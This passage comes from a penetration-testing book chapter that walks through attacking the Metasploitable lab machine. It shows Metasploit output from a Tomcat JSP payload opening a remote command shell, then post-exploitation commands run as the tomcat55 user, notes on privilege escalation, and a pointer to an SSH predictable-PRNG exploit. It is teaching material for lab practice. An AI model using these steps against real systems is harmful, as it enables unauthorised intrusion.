262
Chapter 17
[*] Executing /FW36owipzcnHeUyIUaX/UGMIdfFjVENQOp4VveswTlma.jsp...
[*] Undeploying FW36owipzcnHeUyIUaX ...
[*] Command shell session 1 opened (172.16.32.129:43474 -> 172.16.32.162:9999) at 2010-05-
21 23:57:47 -0400msf
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
whoami
tomcat55
ls /root
reset_logs.sh
mkdir /root/moo.txt
mkdir: cannot create directory '/root/moo.txt': Permission denied
Notice that we cannot write to the root folder, because we’re running
from a limited user account and this folder requires root-level permissions.
Usually, Apache runs under the Apache user account, which is sometimes
apache
but which can also be
httpd
,
www-data
, among other names. Based on
what we know about the operating system version in use on the target, we
could use local privilege escalation techniques to gain further access as root.
Because we already have some basic access, let’s try a couple of different attacks.
NOTE
Here’s a little hint in obtaining root access to Metasploitable, without privilege escalation:
Check out
http://www.exploit-db.com/exploits/5720/
for the SSH predictable
PRNG exploit.
Attacking Obscure Services
When we performed only the default
nmap
port scan, we did not include all
possible ports. Because we have now gained initial access to the system, we
enter
netstat -antp
, and we notice other ports that
nmap
did not scan for